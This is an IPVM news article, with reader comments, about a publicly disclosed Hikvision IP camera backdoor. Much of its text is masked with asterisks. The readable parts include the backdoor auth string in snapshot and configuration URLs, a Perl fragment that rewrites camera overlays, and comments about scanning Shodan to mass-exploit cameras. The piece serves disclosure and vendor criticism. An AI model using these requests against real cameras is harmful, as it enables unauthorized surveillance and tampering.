Hikvision Backdoor Exploit

By: Brian Karas, Published on Sep 03, 2017

Full disclosure to the Hikvision backdoor has been released, allowing easy exploit of vulnerable Hikvision IP cameras.

As the researcher, Monte Crypto, who disclosed the details confirmed, this is:

a backdoor that allows unauthenticated impersonation of any configured user account... the vulnerability is trivial to exploit

Key points from IPVM's analysis and testing of the exploit:

  • The details prove how simple and fundamental the backdoor is.
  • The exploit is already being repurposed as a 'tool', distributed online.
  • A clear majority of Hikvision IP cameras remain vulnerable.
  • Hikvision's heretofore disclosure significantly misled its dealer to the severity of the backdoor.
  • Hikvision, again, has been silent, failing to inform and warn its dealers of this new disclosure.

Plus, IPVM has set up a vulnerable Hikvision IP camera so members can test and better understand the exploit.

Demonstration

We produced the following video, showing just how simple it is to utilize this exploit to retrieve an image snapshot and system information from a camera. We also show using password reset tool to take over a camera:

Inside this post, we examine how the exploit works, how it is being used, how what percentage of devices are vulnerable, and Hikvision's failure to respond to the exploit's release.

**** ********** ** ************ *********** **** ********, ******** easy ******* ** ********** Hikvision ** *******.

** *************, ***** ******, *** disclosed *** ******* *********, **** **:

* ******** **** ****** unauthenticated ************* ** *** configured **** *******... *** vulnerability ** ******* ** exploit

*** ****** **** ****'* analysis *** ******* ** the *******:

  • *** ******* ***** *** simple *** *********** *** backdoor **.
  • *** ******* ** ******* being ********** ** * 'tool', *********** ******.
  • * ***** ******** ** Hikvision ** ******* ****** vulnerable.
  • *********'* ********** *********************** ****** *** ****** to *** ******** ** the ********.
  • *********, *****, *** **** silent, ******* ** ****** and **** *** ******* of **** *** **********.

****, **** *** *** up * ********** ********* IP ****** ** ******* can **** *** ****** understand *** *******.

*************

** ******** *** ********* video, ******* **** *** simple ** ** ** utilize **** ******* ** retrieve ** ***** ******** and ****** *********** **** a ******. ** **** show ***** ******** ***** tool ** **** **** a ******:

****** **** ****, ** examine *** *** ******* works, *** ** ** being ****, *** **** percentage ** ******* *** vulnerable, *** *********'* ******* to ******* ** *** exploit's *******.

[***************]

Magic ****** ********

********* ******** * ***** string **** ******* ******* access ** *** ******, regardless ** **** *** admin ******** ***. *** that ****** *** ********* this ****** ** ********* camera ********:

?****=************

** *** ********** ********* in *** **********:

******** * **** ** all ***** *** ***** roles: ****://******.**/********/*****?****=************ ****** * camera ******** ******* **************: http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK *** ***** ****** calls *** ** ************ in *** **** ***, including ***** **** *** new ***** ** ***** camera ********. ******* **** Hikvision ******* **** ******* firmware ****** ** ***********, one *** ***** ********* code ** ****** ******** of ********* ** ********* devices *********** ******** **** just *** ****** **** call. *** ***** ** all, *** *** ******** camera *************: ****://******.**/******/*****************?****=************

*** ********** ********* ****** with ******** ******** ** vulnerable ** ******** ******** or ********.********* ******** * ******** fix ** ***** ********** **** ***** **** 60%+ ** ********* ******* are ***** ********** (******** below).

DHS ***** ******* - **.*

***' ******* ** **** vulnerability ** * **/**** **** **** ************** now **** *** ********** of ************ ***** ******* has **** ******. **** vulnerability ** ************* **** critical **** ***** ****** cyber ******** ************* ** the ******** ******** (*.*.:***** ******* ****** ***** Vulnerability,***** / ***** *************,**** ****** *************** **** Google ********** ********), *** ** *** ease ** *******, *** number ** ******** *******, and *** **** **** many ******** ******* (*.*., 'grey ******') ****** ** upgradeable ** ******* ********.

Hack *** ********* ******

**** *** *** * vulnerable ********* ****** ****** for ******* ** ********** with. ****** ******* ***:

****://*****************.******.***[****: **** **** ***** page **** ****** ***** password]

*******, ***** *** ******** string, **** **** *** matter ** *** *** simply ****** **************, *** example:

*** ** ************ ******** from *** ******:****://*****************.******.***/*****-****/********?****=************

*** ************ ****** ****:****://*****************.******.***/******/**********?****=************[****: *** ****** **** say "**** *** **** does *** ****** ** have *** ***** ***********”, look ** *** ****** info ******* ***** ****]

*** **** ******** ** Hikvision *** ********, *** the****** *********** *****,****** ***** *******. **** **** ******** and *********** ** *** comments.

Planted, ******** ** ************?

*** **********, ***** ******, who *** ****** **** a ******** ************, **** Hikvision **** *** ****:

** *** * ***** of ***** **** ************* left ** *** ** developers

*******, ** ******** ****:

** ** ****** ********** for * ***** ** code **** ******* ** not ** ******* ** development ** ** *****, yet ** *** **** present *** *+ *****.

Vote / ****

Password ***** **** ***** ** ****

* **** ** ***** user ********* (********* *** admin ****) *** ******** within **** ** *** exploit ************.********* ******** ***** ************ * **** ** enter ** ** ******* for * ******, ******** of * **** ** users, *** *********** ***** the ******** *** *** user. ********* *** ****** code ** **** **** shows *** "****=************" ****** being ******** ** ****** user *********.

Tool ***** ******** ****

**** ******** **** *** just ** ****** *********** change *** ******** *****'* cameras. **********, **** ** literally *** **** ********** of *** ****, ********* the ******** ******* **************'* ******* ******** *****.

300,000+ ********* ********* ******* ******** **********

**** ********* ***,***+ ******* are ******** **********, ***** on ****** **** ******* and *** ********** ******* of *** *************** ********.

******* **** *** ********* cameras***** **** **** * million ***** ******:

~**% ** * ****** of ********* ** ***** devices ****** ** **** showed **** **** **********. Using ** ******* *** from *** **** ********** announcement, ***** ********* ***** be ********** **** ******** cameras, ******* ** ***** showed ******* *********** ********* areas, *** *********, *** other ********* **** ***** put ****** ** **** of ******* **** **********:

*** ****** *** *** name ******* ** "*****" with *** **** "****** by ******* *******" **** displayed ** *** *****:

OEMs **********

**** ******** *** **** found ** *** *******, we ****** *** ********* cameras *** ***** **** vulnerable:

  • *** *********-*** ** ******** V5.4.0build ******
  • ***** **** ****** - 0E-21BF40 -****** ** ******** V5.3.0build ******

***** ********* *** ******* are ****** ********** ** well, *********** ********** *** number ** ********** ******* online *************.

Hikvision ********** *********

*********'* **** ****** *************** ****, **** ** March ****, ************* ****** their *******:

*****, ********* ****** **** a "*********-********** *************", ******** an ******** ***** **** some ******* ********** ****** to *** ****** ****** they ***** "********" ***** privileges ** * ****** role. **** ** *****, as *** ******* ****** instant ****** ****** ** any ******** ******.

******, ********* ******* ** was **** ********** ** "fairly ******** *************", ****** scans, *** ****** *****, show **** **** ******* vast ******* ** *******, the **** *********** ***** that *** ******** *** network ****** ** *** device.

*****, ********* ******* *** exploit "*** *****" ********* to "******* ** ****** with ****** ***********". *** tests, *** ***** ******* online, **** **** ** 100% ********** ** ******** devices, *** ****** *** just *********** ** "*********" with ****** ***********, ** allows **** ******* ** the ******, **** ********, and ***** ************* **** that *** ****** ********* information, **** ** ***** addresses, *** *** ****** info.

****** *********'* **** ************* to ****, ********* ********:

** **** [*** ****], Hikvision ** *** ***** of *** ******* ** malicious ******** ********** **** this *************.

Hikvision ** ********

***** *** ********* **** exploit ****** *******, ********* has **** ** ****** publicly *** ** ******* about ****, ******* **** the ******* ******** ****** examples ******* *** ** use *** ******* ******, putting ********* ** *********** risk. **** ********** ******* ** ********* failing ** *********** *** responsibility *********** ********* ** *** material ***** ** ***** products.

Comments (109)

**** ********* *********,

*** ** *** **** to ********* ********* ********** to ** ******. **** a ****** ******* *** such * **** ******** clearly ***** ***** ******.

***** ** ** **** to ***** ******, *** management:

  • ** ********* ** ****** “#1” ** *&*, **** 10,000+ ‘*********’, ** **** claim, *** **** ********* like **** ******?
  • ** ********* ** ** regain *** ***** ** their ******** *** *********, how ** **** *** proactively ****** **** ** the ***** **** **** disclosure ** *** *******?

******** *** ****** ** take *****, ****** *********:

#*) *** ** **** report ********* **** **** previous ****** ********* *** same ***** *****? ** am * ******* *********?

#*) *** ********* ***** the ******* **** *** latest *********?

#*) *** ** **** report ********* **** **** previous ****** ********* *** same ***** *****? ** am * ******* *********?

** *** ******** ******, the ******* ** *** vulnerability, *** *** ** exploit **, **** *** known. ** **** ******, *** actual ************* *** **** disclosed, *** ** ** extremely ****** ** *******. Any ********** ****** ********* to *** ******** *** be ****** ******, *** manipulated, ***** **** ********* as ****** ** * copy/paste *********.

#*) *** ********* ***** the ******* **** *** latest *********?

*********'* ****** ******** ** not ********** *************. ***** *********'* ******* cyber ******** ******, ** would ** ********** ** assume *** ****** ******** has ***** ***-**-**-********** *************** in **. ************, *** fact **** ***** *** hundreds ** ********* ** vulnerable ******* ****** ***** shows **** ****** ********* firmware **** *** ***** solve *** *******, *** need ** **** **** every ****** ** *******.

*** **** ********* (*** all ***** ************ *** that ******) ****** *** cameras **** * ******** flaw ** ******? **** cloud *** **** ******* have **** ********* *****'* a *** ** **** back ****** **'* * bad ****.

***'* *** ****** **** a *** ** *** hikvision **** ****** ******* have **** ****** **** modified ******** ******* ** Hikvision's *******. *** ** they ****** ***** *** are **** *********** *** those?

****** ******: **** ***'*. Reputable ************* *** **** tools (**** ******** ****) to ****-****** * ***** of *******, *** ***** aren't ******* ** ************ where *** *** **** dozens ** ********* ****** purchased ** *** **** of **** *****. **'* laborious ** ** ******** when *** **** * lot ** *******, ** updates *** ******* **** if **** **** ********* for **** ********. ** the ******* *** ****** the ******** ** ******** updates... ****, * **** they ***'*.

******* ** ** **** ancient **** **** **** was *********** ** ****** Basic ** *********, ** was *** **** *** to ****** *** ******* and ** **** ******* when *** ***** ** use **. ** **** for ***** *******.

***** ******* **** ***** actually **** ***** ** a ***** **** ** solve **** ******* *** that *** ******* **. for *******, **** ******* logs **** ***** *** or ** ****** **** get * ****** ****** "critical ****** ******"

** *** *** **** updates **** ***. ******** we *** ** ***** with **** *** ************ if *** **** ****** lost ***** **** * specific ******** *******. *** already *** ***** ******* in *****. ** **** release * *** *** click ****** ***. **** nice ** ****. * don’t ********** *** *** camera ************* ***’* *** this **** **** ** work.

* **** ** ** environment ***** ** ******** have **** ***+ ********* cameras, *** ** * total ** **** *,*** cameras ** *** *******.

** ********* (***** * months) ***** *** *** firmware *** *** *** cameras, *** *** ****** control *******, ** **** - *** ********** ** have ** *** ** network.

** ******, ** **** monitor ***** **** ** this *** **** ** new *************** *** **** we ******* *** ************ for ** ********* ***** (if **** **** ***), or ** ****** **** develop *** (** **** don't).

** ****** - ** also ******** **** **** of ***** ** *********** our ****** ******** ******* on **'* *** ****, using ******* ******** *******, behind * *** *** we ***** **** ***** 'default *****' ** *** equipment.

**** ** *************. * have ** ***, ***** to *** ****** *** built **** ****. ** works.

**'* ******* ** ** that ********* ****'* ****** it ******** ***. **** need ** **** ********* new ******* *** ***** working ** ***** ********.

****** ** *** **** ** ***** * ******** *****, ******!

***** **** **** *** its *********** ** **** dealings **** ******* **** or *** **** ****** do *** **** **** Hikvision *********? * **** report **** * ** told ** ********* ********* to *** *****-***** *** I ***** *** **** someone **** * ********* is *** **** *** accusing **** ** *********** of ****.

#*, ** ****, ***'* try ** ****** *** subject. ** **** **** Hikvision ******* ** '******* ********'** ***** ****** ************ on **** ********** (****** I ***** ******* *** is ****** *** **** we *********).

*** *** **** ** have **** ******* ****** and ******* ** **** companies.

***, *** ** *** you, **** **** ***** string ******** ******* ***? Why?

** **** *** ******* me **** * ****** bit. ** ***** *********** networks *** **** ******* BEHIND ***** ******** **** 99.9% ** **** *********** do. **** ** ******* example ** * ******** grabbing, ********** ***-*** **** really **** ** *****, sorry *** **** ** my **** ** *** ongoing '******' **** **** is ****** **** *** limited ************ **** **** have ********** **** *********.

#*, *** *** * loyal *******.

***, ** *** **** to ******** **** ***** string ****** ** **** customers? ** *** ***** they **** * ***** to **** ***** **** magic ****** ********?

*******........ :)

*******........ :)

****'* *** *******. *** the ********* ****** *** publicly ****** *****. *** I ** ********* **** most **** ** ****** with ***** *********, **** though ********* ******* ** know ***** * **** this ******.

** **** ******** *** they (*** *** ************'*) need ** ** ****** at ****. * **** if ******* *** *** hacked - *** ***** job ** ** ******* your **** - ****** can *** ******. ** is **** *** ********* take **** **** ********* than **** **** ** the ****. ** * had * ***** ******** college - **** ** the ***** * ***** encourage **** ** ***** asap!

**** **** - ***/*** silence ** **** **** direct ******** ** *******

******* *** ***** ***** us ** *********** **** article ** *** *******?

******* *** ***** ***** us ** *********** **** article ** *** *******?

**. ******-*********** ********** *****. ** ***** members (**** ************) ******** ****** *** * free ***** ** ****.

******* *** ***** ***** us ** *********** **** article ** *** *******?

****** * **** *** paste ***** ************* ** not *******, ** **** points ***, *** *** also *** *** "*-**** this" ****** ** *** top ** *** ******:

** *** ********* ** a ****** **** **** see *** **** ******, if *** **** ** least *** * ***** of **, (***** *****).

***** **** ** * 1-2 ***** **** *** invite *******.

**** ********** ** **** CHINA, *** * ** from **** **** *** part ** ** ******** China. *** **** ** that **** **** *** make ******** ******, *** that ***** ***** ** Security. *** ****** ** Hong **** ****** ***, they *** *** **** door *** *******.

****'* *** * *** easily ** **** **** the ******* **** **** are ***** ********** ****** change ** ****** ******* before.

** **** **** ******'* **** **** ******* ********** *** **** from ****** * ***?

******* ******* ** ******** ************** ** * **** *******.

******* *** ** *** *** *** **'* *********. **** *** still **** ********** ** ********** ***** **** ***, ***** **** day *** *** ****** ******.

***, ** **** **** definitely **** **** ****** the ***.

** **** ******* *** on * ********, ********** or ***-****** **** ** physical ***, ***'** ****. Larger ***** **** ** install **** ***.

** **** ******* *** visible ** ******** ****** your ***, ** *** can **** ****, **** any *** ****, ******** or ******** ******* *** can *** **** *******. Smaller ***** **** ** install **** ***.

***** *** **** ** exploit, ******** ****** ** moving ***** ******* **** firewalled ****'*. **** *** be **** **** **** layer-3 ******* ********, ***/** a **** ******** **** OPNSense ** ****.

****, ***** **** **** backdoor *** **********, ** malicious, *** ****** ******** block ******** ******* **** the ******* ** ****. This **** ***** *** "phone ****" ********.

*********** #*, **** **** rate ******* **** ** on *****. *** ***, that's *** * **** thing.

*** **.*% ** "****" *********** **** **** *** **** ****** threats **** **** ******.

** ****** ***** ******* you **** **** ** the *****, ********* **** country, *** ******* ** this. *** *** ** exposed ** ****? ********, greed, *** **********. *** many ***-*** ************* *** going ** ** *******? How **** ** ** to ******* ******** ** all ** ***** *******? Everyone ***** **** ******* will ** *******. ***** installations ** *********, ***********, sensitive ******... *** ***** are ***** ** ** thousands ** *** ******** of ********* ** ******* compromised **** ******. * swear, ** ******* **** Hikvision ******** ** **** down/DDoS *** *********** *******... I'm ***** ** ** furious ** *** ** you *** ******* **.

* ***'* ********** *** people **** ***** ** undisclosed ********. *** *** seems **** *** *** working ** *********.

**** ** ***********, ** is *** **:

*- **** ** ****** in *** *****.

*- ******* ** *, but ******* *** *** same: ******* ** ******* instance ****** ***'* ************, but **** * ******** public ********* **** ** whom "***" ** *** part **.

*- **** *** ** an ********** ***** ** choice.

***** *** ** **** others, *** * ***** it ** **** *** normal ** **** *** use **** ******. ** are **** ****** **** an ********, ****** ** make ****** ****.

**** ****** ** ***** one ******* **, *** specially ** *** **** testing *** ********** *** information.

** **** *** ******* me **** * ****** bit. ** ***** *********** networks *** **** ******* BEHIND ***** ******** **** 99.9% ** **** *********** do.

***...***** **** **/*** *** that ********** ****? *** numbers **** ****** **** a ********* ********* ****. Please...if *** *** ***** to ****, **** * factual "****" ****** **.

****** ****

** ******** *********** **** happen, ****'* *****.

*** ** *** *** a "********" **** ****, you **** ** **** sure **** **** ********* blackbox-testing-system ** ****** **** that **** ******** **** not ***** *** *********. It's ********** ** ** have **** ******* ** speed ** ***********, *** you **** ** **** sure (********* ***** **** great *** ****) **** your ******* **** ***** get's *** ** **** office.

* ***** **** ********* has **** *** ********/******* issues ****. ***** *** developers *** *** ***** what **** *** ***** when **** *** **** kind ** *********.

***...** **** ** * workaroung ** * *********, why ****'* ** *** something **** ** ******** like "****", "*****", "********", "superuser"? *** ****** ***** like ** ******* ****** to **** ** ***********, using * ***** **** random ******....

* ********** ***** **** this **** *** ******** for **********, ******* *** string ** *** *********** to ** *** ******* purposes ****. ** ******, I **** ** ***** for ****, **'* **** my ******** ******** *** my ********** ** ******** developer **** ***** ** that ********* ** ******* here. * ***** ***** choose **** * *********** string ** * **** to **** ** *******/*********** more **** (*********** ** course).

**** ** * *****

***...** **** ** * workaroung ** * *********, why ****'* ** *** something **** ** ******** like "****", "*****", "********", "superuser"? *** ****** ***** like ** ******* ****** to **** ** ***********, using * ***** **** random ******....

*** ************ ****** ** "admin:11" ******* ** ******.

**** ** * ****** approach ** ******** ********/******** combos **** ********** **********.

*** *** **** **** by ******* **** ****** into * ****** *******/*******,**** ** **** ***.

***** *** *****, * ****** ** ***** ****.

** * **** ** ******* *** ***** ***** *** ******** :-)

** **** *** **** ************* ****** ** *** ***** *** their ******** ***** ****, *** *** **** ***** *** ***** string ** **** ******** **** *******/***********?

*** ******** ***** **** is *** *********'*, ** is ** *********** ********** work, ***** ** *** of **** *******.

****** - **** *** Online

** *** *** ** our ********* *** ******* online ** ****** ***** to **** ******* **.

*** ****** ** ********** at:

****://*****************.****.***

******* ****:

*** * ******** **** the ******:****://*****************.****.***/*****-****/********?****=************

*** ****** ****:****://*****************.****.***/******/**********?****=************[****: *** ****** **** say "**** *** **** does *** ****** ** have *** ***** ***********”, look ** *** ****** info ******* ***** ****]

******* *****:

****, ***** ** ****** this **** *** ** getting *******, *** **** of **** *** ** allow ****** ** *** out **** ********, *** see *** **** **** exploit ** ** ***********. Please *** ** ******* from ******* ******** **** would ******* **.

**** ** *** ****** commands ******* *** ** do ** **** ***, and **** ** *** file. ***** *** ******* ways ** ** ****, but **** ** *** simple ******* ***** **** from * ******* ****:

*) **** * **** called "*********" *** *** the ********* **** ** it:

*** *******="*.*" ********="***-*"?> version="1.0" *****="****://***.***-***.***/*****/*********">***********> ********************> *********>

*) *** **** ** PUT *** ****, ***** with *** ****** *** to **** *** ********* function:

**** -* ********* ****://*****************.****.***/*****/********/*/*********?****=************

**** ****** ** ********* on ** * *** linux ******* ** *******, and *** ************ ** **** ****.

**** ** **** ******** in******* **********, *** ******** ** Windows **.

**, * **** **** **** **** ***** *** ******* *** not ***'*/***'*, *******?

* ***** *** **** ** * *** ********* *** *** got ** *******.

***, **** ** ******** to ********* *******.

***** * ***** **** is ******** **** ********* had **** *****, * think **'* ******** ********* that *** **** **** this **** ******* ******* and *** **** *** that ********* ******* ****** a ***** ** *** more ******* ****** ** the *******.

********* *** ***** **** of *** ******:

**** ********** ** ************ *********** **** ********, ******** easy ******* ** ********** Hikvision ** *******.

*** **** ** *** first ******* ****** ** the ******:

*** ********** ********* ****** with ******** ******** ** vulnerable ** ******** ******** or ********.********* ******** * ******** fix ** ***** ********** **** ***** **** 60%+ ** ********* ******* are ***** ********** (******** below).

******** ****** **** *** funny:

**** **, ********* ** even ****** *********** **** *****...

******* **** ******** *** **** ** ********* ** **** *****:

****** ************* ******* *********** ******* ** **********'* ********?

**** ** *****!

**** ** *********** *** I **** *** ***** in *** *****. ** biggest ******** ** *** would ****** **** ***** cameras ******** ********** *** a ****** ** ** a **** ******* ******** to *** ******? **** in *** ***** ****** network ****, *** ***** this ****** ** ******** facing *** ***? * understand *** ********** ** security, *** * ***'* trust *** ****** ** really *** ***** *** device ** ** ******** accessed ** *** ***. I ********** ** ***** is ** ******* ** DVRs ** **** ******* those *** **** ***** configured ** ** ******** accessible.

* ***** ** **** point, ***** ************ ***** to **** **** * significant **** ** ***** budget ***** ** ** allocated ** ***** ***** security ******* ** ******** if **** ****'* ***** so *******. * ******* there *** ******** ******** in ***** ******** *** hackers **** ** ****** devices **** ***** ****** share.

* ******* ***** *** probably ******** ** ***** products *** ******* **** to ****** ******* **** large ****** *****.

***** * **** ** agree **** **** *******, it ** ***** ******** out **** *** ******** of *** ***** ******** vulnerabilities ********* *** ******** from **** **** **** simplistic ** ******.

*** ************* ****, *** example, ** **** *** kind ** ***** *** would ****** **** ** early *****, *********** ******* that *** *** **** the ********* ** ******** address ***** ********.

********* ** ******** ******* when ** ***** ** cyber ********. **** **** statements ***** ***** ******** commitments, *** *** ** downplay ***** ********* ********, but **** ***** **** and *********, ***** ** no ****** *** ****** like ****-***** ************** ****** mechanisms ** ******** ********.

* ********** *****. ***** has *** **** ******. They *** ******* *** Onvif ******* *** **** when **** ******* *** other ***** *******, *** Onvif ******* ********** *** I ***** *** *** been ***** ** ** least ** ***** ************** is ****** **, *** camera ** ****** ***** in ** ********.

*** ******* **** ********* is **** **** ***** a ********* ******** **** fix ***** ******. *******, lip ******* **** **** so ***.

** ************ ***** ***** aren't ****** ******* ***** that *** ** ***** concern. *** ***** ******* is ******** ****** *** engineering *** ** **** of ****** ******** ********. It's ***** ***** **** a ****** *** ** teach ***** ************* *** to ******** ****** ***** devices ** ***** ***** circuits. **** *** ***** companies **** ***** ********* departments *** **** ***'* write ******** ***** *** when *** *** ***** specs, **** ***** ***'* know. *** ********** ****** needs ** **** *** pray **** **** *** system ** ********, **** it's * ***** ******. If ***, **** *** integrator **** ***** **** troubleshooting ** **** ******* quiet.

* ***** *** **** reason **** *** *** been ******* *** *** is **** ***** ***** are ** ******* **** are ******** ** ** used *** ******** ** are ******* ** *** security ******** *** *** up ******** ********** *** secure.

***.

******** *** *** ***** to ********** *** *****. Just *** *******.

* ***'* **** ** Dahua *** * "***** string" ******** ******. **** is * *** **** extreme.

**** ****** *** **** ******* *** ******* **** ** ** so ******* ** ****** **** ****** ****** ** *** ****** after *** ****. (** - ****** ******** ** *** ******)

* *** **** *** from ********** ******* **** camera ** *** ******** that ******** * *** of ****** ***'* **** realize ***** ******* *** on *** ********.

* ********* ** ****** to ***** *** *** port ******** ** ***** things, ******* *** ****** in, *** *** ****. I **** ** **** forward ** *** ** was ******* ********* ******* UPnP (************* *** **) defaults ** ** ** my ******.

* ******* **'* *** same *** **** ** these *********** *****, *** their **********/***********, ** **** exist, ***'* **** *** better. ****'* *** ***** are ***** ********* ******** flaws *** ****** **** not *** ** ******* with **** ********.

**** ****!

***** *. *** * **** * ****-**** ***** **** *****?

** **** ** ** will *** *** ** stuck ** * **** or **** ** ************. If *** ***** ** will, ***** ** ** me *** * *** run ** ** * different ******.

**** **** *** **** *******. ****** ** **** *** ***** 1 ******.

********** **** ** ******? ** ***** **** *** ***-*** ** back *** ** **** ****.

***** ****.

*** *** **** *** code *** **** ** test ****?

*'** **** **** *** **** *******. **** ** ****** **** just ***** *********'* *** **** *** ****. ** **** ***'* work *** **** ******* * **** * ***** ***.

**** -* *** ****://**.***.**.***/******/******/?****=************

**** -* *** ****://**.***.**.***/******/******/?****=************

* ***** ** ***** the **** *** ** the ******** ****

**** -* ****** *****************.****.***

***** *** **** **** zzfile ******** *** ******** XML *******

*** *** *** ********* result:

% ***** % ******** % ***** ******* ***** Time **** **** *******
***** ****** ***** ***** Left *****
* *** * * 0 * * * --:--:-- *:**:** --:--:-- *html>
******** *****: ****** *** Allowed
****** *****: *** -- Method *** *********>
****** *** *** ********* by **** ******* ** this ******** *>
****>
****>
*** *** *** *** 100 *** *** *** 0:00:02 *:**:** --:--:-- ***

* **** ***** * POST ******* ****

**** --******* **** -* @zzfile *****************.****.***

*** *** *** ********* result:

���


*****>
/>


/>

****>

****>

******.********.**** = "/***/****/*****.***?*" + (new ****()).*******();
******>

**, * ***'* **** things ******* *** *** ...

*** **** *******, **** perl ********** ****** *** you ****** ***. *** reference, *** *** ** called ** ******* *** text *** **** ** overlay, ** * *** Y *** *** *** text, *** *** ** for *** **** (*..* , ********* *..*, ********* on ****** *****):

*** *********** {
** ($*******, $****, $****, $ID) =@*;
***** "******* **** $******* on ******...\*";

$***********='*** *******="*.*" ********="***-*"?>

'.$**.'**>
***********>
'.$****.'****>
'.$****.'****>
'.$*******.'*******>
***********>';

** $******** = $**->*******(*** 'http://'.$DeviceIP.'/Video/inputs/channels/1/overlays/text/'.$ID.'?auth=YWRtaW46MTEK',
************ => '****/***',
******* => $***********);

}

**** **** ****** *** overlays (***** ** ** alternate ****** ** ****** individual ******** ** ** as ****):

*** ********** {
***** "******** ******* ****\*";
** $******** = $**->******('****://'.$********.'/*****/******/********/*/********/****/*??****=************');

}

***** *** *** ***** formatting, **** ** *****.

*** **/*++ **** ** quite **** ***.

******** *** ******* ** OpenSource ******* *** **** OS (***.**.**).

****** * *** ******* and *** "** += network" ** **** .*** file.
****** ** ******** ** QNetworkAccessManager ("**********" ** ** example) *** ******* *** "finished" ****** *** ****** processing ** ******.

.* ***********
*******:
********************** **********;

.*** ***********
****->********** = *** *********************(****);
*******(****->**********, ******(********(**************)), ****, ****(*************(**************)));

**** *.*. *** **** buttons ** **** ** and **** *** ********...

*** (********)

*************** *******;
*******.******(****("****://*****************.****.***/*****-****/********?****=************"));
****->**********->***(*******);

*** (*** ******* *)

*************** *******; *******.******(****("****://*****************.****.***/*****/******/********/*/********/****/*?****=************")); *******.*********(***************::*****************, "text/xml");
********** **** = "*** version=\"1.0\" ********=\"***-*\"?>***>***********>******>*******>****** IPVM *** **** **** demo ****!*******>***********>";
****->**********->***(*******,****);

*** *** *** *** "replyFinished"-Slot ** *****/******* ******* (e.g. **** ********* **** files ** **** ****** xml *********).

** ******, ***** * shell ** **** **** as *** ****** *****, but * **** *++ more :-)

** ******, ***** * shell ** **** **** as *** ****** *****, but * **** *++ more :-)

* ***** ******* * or *++. ***** ********* I ****** **** ****, but * *** **** pressing ****** ** **. The *** ***** * have *** ** **** a * *******, * was **** ** ****** out **** ** ** just ****** ** *** my *** ****.

** *** ***** **** to *** *** *** and *** ******** ******* in **/*++, *** * should ** **** ** make * **** ****** configuration ****...

** ******* ******** **** code (** #*'* ****** request) **** **-***** ** Shodan ** ******* *********, It ***** ** **** to ****** (** *******) many ********* ** ******* worldwide. **** ********* ***** return ***** ******* ******* they *** "******" ** stuck ** ****** *****.

**** ***** ***** *** financial ************ *** ********* if **** ******** ********* send **** ***** ******* or **** ********* ******* simultaneously.

***** ***** *** ********* to **-******** **** ***** create :)

** ******* ******** **** code (** #*'* ****** request) **** **-***** ** Shodan ** ******* *********, It ***** ** **** to ****** (** *******) many ********* ** ******* worldwide.

******. * ***** * quick ****** ** *** through * ****** ****** and **** *** *****-**** URL. ******** **** **** intentions ***** ****** ******* a ******** ** ********* cameras, ***** ***** ****** cause * **** ** support *****, * **** of ***/*********** *****, ** maybe ****?

****** **** *** ********* thing ** **...

**** ***** ***** *** financial ************ *** ********* if **** ******** ********* send **** ***** ******* or **** ********* ******* simultaneously.

**** ****** *** ******** - *** **** ** these ******* *** **** market / ******* ********? I ***'* **** *** answer *** *****'* ********* many *** ***** ***** that ********.

*** ****** ****** ***** to ******* *** ************* date. ** ** ***** be ******** ** ****** only ******* **** *** in- ** *** ** warranty ** ******* ***** to **** ********* ** benefit **** *** *******. Of ****** **** **** not **** *** **** market *******.

** ********* ***** *** this ****** ** **** cameras **** *** *** of ********, **** ***** be * **** **** to ***** ***** **** replacement *****.

********** ***** *** **** tool ** ******* ********* cameras ** ***** ****** (by *** **) ** trigger ******* *****.

***** **** ******* ** a ****** ***** ****? :)

* ***** ****** ****** not ** ***** **** forum ** ********** **** to ****, **** ** otherwise ***** ************* ** Hikvision *** ***** *********. In *** *** *** people *** **** ***** cameras ********* *** **** normal ****** *** **** on *** ******* ** keep ***** ******** ******, watch ***** ******** ** for ***** ****** *******. If ******* **** *** advice ***** **** ** could ***** * **** inconvenience *** ******** ********* harm ** ********* ** unsuspecting *** ***** *** are ********** ********

*** *********** ** **** page ***** ****** **** anyone *** ***** **** need ** ***** **** problems *** *********. * think *** *** **** about *** ** ****** automated ******* ** ***** mass *********** ** ********* should ** *******. ************ other ******* ** ******* harm **** ** ******** people *** ** ***** a ****** ** ***** a ****** **** ****** be *******.

******* * ******* **** is **** ** ******* people ***** *** ******** in *** **** ******** but *** **** ** a ***** ***** ****** can ***** *** ** hack *** ***** ****.

* ** *** **** for ** *** ********* and **** **** ******* to ****, * **** think **** ** ********* here ** ***** *** could ****** ** ******* to **** ******.

* ***** *** *** talk ***** *** ** create ********* ******* ** cause **** *********** ** Hikvision ****** ** *******

** **** *** ****** one *** ** **** are *******. ****** ********* and ******** *** **** up **** **** ******** before * ****** ****** is ****** ****** ***** it, *** ***** **'* also ***** *** ** design ******** *** **** sure ***** *********** ** safe **** **** *****.

* ***** **** ** essay ** ***** ******** (*****://***.********.***/******/********/****/**/********************.****):

"******* ******** ****** **** accurately ********* ***** *** risk. ******* ********* ****** debate ***** ********, *** inhibits ******** ********* **** leads ** ************. ******* doesn't ******* ********; ** stifles **."

** ** ******* **-******** is ** ***** **** is ********* *** **** in *** ********. *** so **** *****, ****** really ***** *****. **** products *** * ******** risk *** ********.

***** ******** *** **** about ***** ** ******** by *** ****!

***** *****/******** **** *** talk ***** ***** ** checked ** *** **** if ******* ** ** home!

**** *** *** ** trusted "********" ******** ***** a *** ********** **** to *** ***** ** the ********. **** ***** products, *** **** ** bigger **** ******* *** products *********.

* ********** **** *****, but * ******* **'* much ****** *** *** whole ******** ** ******** the ********* ** **-******** to ***** * ***** where ** *** **** secure ********.

** *** *** * big ***** **** ***** everyone ** **** *** developers, *** - ** a **** - ****** that ** **** ********** will ******* ******* ********. The ******** ******** ** big ****** ***** **** this ** *** *** truth. *** ****** ** developers ** **** ** indication ** *** ***** that ***** ********** *** cause ** **** **** in **** *********.

* **** **** **** ongoing ********** ***** **** some *********** ***********, *** I ******* **** ******* will ****** ** ** do *** *** ** inform *** **** **** our ******** *** **** the ***-*********.

***** *** **** **** how ** ******* **** issues. ***** *** **** good *** ******** *** there. ***** *** ******* that **** *** *******/******* built-in, **** ******* *** to ********* ****** *********** to *** ********, ** matter **** ****** ***'** using ** ****** *** cameras. *** ******** ***** to ***** ** ***** IT-Security, **** ***** **** if *** ****** ******** cause * ********* ****.

**** ** * *****

#*, ****** *** *** feedback *** * ********** the *******.

*****, **** ** ******* damaging ******'* *********. **** is *** ** *** effectively *********** *** *** camera(s) *** *** ****.

*******, ** ***** ** talk ** ***********, ****'********** ** *** ****** disclosure **** ***** ******. **** ** *** key *******:

******* **** ********* ******* only ******* ******** ****** by ***********, *** *** flash ********* **** ** render ******** ** ********* of ********* ******* *********** unusable **** **** *** simple **** ****.

** *** '***********' ** fairly ******* ***** *** bad *** ********* ******** is.

